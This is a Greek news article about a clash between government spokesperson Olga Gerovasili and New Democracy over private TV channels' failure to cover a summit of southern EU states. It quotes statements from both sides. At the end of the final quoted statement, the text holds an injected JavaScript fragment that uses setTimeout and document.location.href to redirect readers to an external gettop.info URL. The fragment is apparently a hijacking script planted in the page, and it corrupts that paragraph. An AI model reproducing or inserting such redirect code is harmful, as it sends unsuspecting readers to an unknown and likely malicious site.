Γεροβασίλη: Έχουμε κάθε δικαίωμα να υποδεικνύουμε στα κανάλια τις ειδήσεις

0
9

 

Νέο επεισόδιο στην κόντρα με την αξιωματική αντιπολίτευση καθώς η κυβερνητική εκπρόσωπος Όλγα Γεροβασίλη επανήλθε το πρωί με νέες δηλώσεις σχετικά με την κάλυψη της Συνόδου των χωρών του Νότου από τα ιδιωτικά κανάλια και την αντίδραση της Νέας Δημοκρατίας.

Όπως τόνισε η κυρία Γεροβασίλη «η NΔ για μια ακόμη φορά λειτούργησε ως γραφείο Τύπου των καναλιών» και συμπλήρωσε: «Το αυτονόητο δικαίωμα του Ελληνικού λαού στην ενημέρωση για τόσο σημαντικά ζητήματα, όπως η χθεσινή Σύνοδος Προέδρων και Πρωθυπουργών στο Ζάππειο, καταπατήθηκε απ΄ την επιλογή των ιδιωτικών καναλιών να προβάλλουν ή να αποκρύπτουν ότι νομίζουν».

«Στη Δημοκρατία είναι δικαίωμα και υποχρέωση της κυβέρνησης να το επισημαίνει δημόσια, ειδικά όταν θεωρεί ότι η πρακτική αυτή υποκρύπτει σκοπιμότητα. Η ηγεσία της Νέας Δημοκρατίας δεν εξέπληξε κανέναν καθώς έσπευσε να στηρίξει μια πρακτική επιλεκτικής πληροφόρησης. Λειτούργησε ακόμη μια φορά σαν γραφείο τύπου των καναλιών. Καλώς για τις μικροπολιτικές της επιδιώξεις, κάκιστα όμως για τα εθνικά και λαϊκά συμφέροντα», ανέφερε η Όλγα Γεροβασίλη υβερνητική εκπρόσωπος και σχολίασε πως η ΝΔ «μάλλον έχει διαβάσει τον Όργουελ ανάποδα».

Η ΝΔ «προφανώς, στενοχωρήθηκε από την επιτυχία της Ελληνικής κυβέρνησης και την διεθνή απήχηση της χθεσινής Συνόδου», δήλωσε επίσης η κυβερνητική εκπρόσωπος και πρόσθεσε: «Τα βαθύτατα αντιδημοκρατικά τους χαρακτηριστικά ακόμη μια φορά ξεχειλίζουν μέσα απ’ την άθλια, προκλητική ανακοίνωσή τους. Η ηγεσία της Νέας Δημοκρατίας δεν μπορεί να διαφύγει απ΄ την ιδεολογική της μήτρα και αποκαλύπτεται καθημερινά».

Όλα ξεκίνησαν από τη χθεσινή δήλωση της κυρίας Γεροβασίλη ότι η Σύνοδος Μεσογειακών Κρατών της ΕΕ, η οποία βρέθηκε στο επίκεντρο του διεθνούς ενδιαφέροντος, μάλλον δεν αποτέλεσε σημαντική είδηση για τους ιδιωτικούς τηλεοπτικούς σταθμούς, προφανώς, ως μη συμβατή με την εικόνα καταστροφολογίας, που συστηματικά προβάλλουν για τα πεπραγμένα της κυβέρνησης.

Η κυβερνητική εκπρόσωπος σχολίασε ειδικότερα πως κανένας ιδιωτικός τηλεοπτικός σταθμός δεν διέκοψε το πρόγραμμά του για να προβάλλει τις δηλώσεις δύο Προέδρων Δημοκρατίας και τεσσάρων πρωθυπουργών και ότι τα ιδιωτικά κανάλια προτίμησαν να παίζουν επαναλήψεις και εκπομπές μαγειρικής.

Σ’ αυτήν τη δήλωση απάντησε χθες η Νέα Δημοκρατία τονίζοντας πως η θέση της κυβερνητικής εκπροσώπου είναι ντροπή για τη Δημοκρατία.

Αναλυτικά σε ανακοίνωσή της η αξιωματική αντιπολίτευση αναφέρει: «Η αποψινή δήλωση της κυρίας Γεροβασίλη αποτελεί όνειδος για τη θέση κυβερνητικού εκπροσώπου και ντροπή για τη Δημοκρατία

«Η εκπρόσωπος του κ. Τσίπρα με μια πρωτοφανή ανακοίνωση που έρχεται από τις πιο σκοτεινές εποχές της σύγχρονης ευρωπαϊκής ιστορίας, εγκαλεί τα ιδιωτικά κανάλια γιατί δεν έκοψαν το πρόγραμμά τους για να μεταδώσουν απευθείας το γεγονός που εκείνη έκρινε ότι όφειλαν να μεταδώσουν!

Το επόμενο στάδιο είναι να ζητήσει οι συσκέψεις για τα δελτία ειδήσεων να γίνονται στα υπόγεια του Μεγάρου Μαξίμου, ώστε ο ελληνικός λαός να έχει «την ενημέρωση που πρέπει»!«, σημειώνει η ΝΔ και προσθέτει:

«Η οργουελιανή δήλωση της κυρίας Γεροβασίλη, προφανώς κατ’ εντολήν Τσίπρα, αποκαλύπτει με ξεκάθαρο τρόπο πια, τι είχαν και έχουν στο μυαλό τους με τις τέσσερις τηλεοπτικές άδειες! Καλούμε και τα υπόλοιπα κόμματα και τις δημοσιογραφικές ενώσεις να καταδικάσουν τις ολοκληρωτικές πρακτικές της κυβέρνησης.

Για να μπει τέλος στον κατήφορο, στον οποίο έχει σπρώξει τη χώρα και τη Δημοκρατία η κυβέρνηση Τσίπρα». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here